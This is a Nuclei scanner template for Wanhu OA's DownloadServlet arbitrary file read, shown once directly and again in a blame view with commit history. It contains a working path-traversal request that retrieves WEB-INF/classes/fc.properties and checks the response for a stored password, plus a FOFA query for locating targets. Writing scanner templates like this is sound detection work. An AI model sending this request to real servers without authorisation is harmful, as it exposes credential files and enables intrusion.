nuclei-templates/http/vulnerabilities/wanhu/wanhuoa-downloadservlet-lfi...

id: wanhuoa-downloadservlet-lfi

info:
  name: Wanhu OA DownloadServlet - Remote File Disclosure
  author: wpsec
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: oa,wanhu,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body,'ccerp.password')"
          - "contains(header,'application/x-msdownload')"
        condition: and
# digest: 4a0a00473045022100b228dc4e3eaf62093f8dde3f6ab30a815d93c41fb0ccf06de4160ee939bf90060220367e764c86484bc4f38116b298dc445b71017a667b777e7d1534a40feb98e148:922c64590222798bb761d5b6d8e72950
Update and rename wanhuoa-DownloadServlet-LFI.yaml to wanhuoa-downloadservlet-lfi.yaml 2024-01-12 06:41:05 +00:00			`id: wanhuoa-downloadservlet-lfi`

			`info:`
Update wanhuoa-downloadservlet-lfi.yaml Title This is remote file disclosure, not LFI based on PoC or two linked disclosures. 2024-02-14 19:21:26 +00:00			`name: Wanhu OA DownloadServlet - Remote File Disclosure`
author name update 2024-01-12 06:41:38 +00:00			`author: wpsec`
Update and rename wanhuoa-DownloadServlet-LFI.yaml to wanhuoa-downloadservlet-lfi.yaml 2024-01-12 06:41:05 +00:00			`severity: high`
			`description: \|`
			`There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.`
			`reference:`
			`- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`fofa-query: app="万户网络-ezOFFICE"`
			`tags: oa,wanhu,lfi`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code == 200"`
			`- "contains(body,'ccerp.password')"`
			`- "contains(header,'application/x-msdownload')"`
			`condition: and`
Auto Template Signing [Thu Feb 15 04:43:17 UTC 2024] :robot: 2024-02-15 04:43:17 +00:00			`# digest: 4a0a00473045022100b228dc4e3eaf62093f8dde3f6ab30a815d93c41fb0ccf06de4160ee939bf90060220367e764c86484bc4f38116b298dc445b71017a667b777e7d1534a40feb98e148:922c64590222798bb761d5b6d8e72950`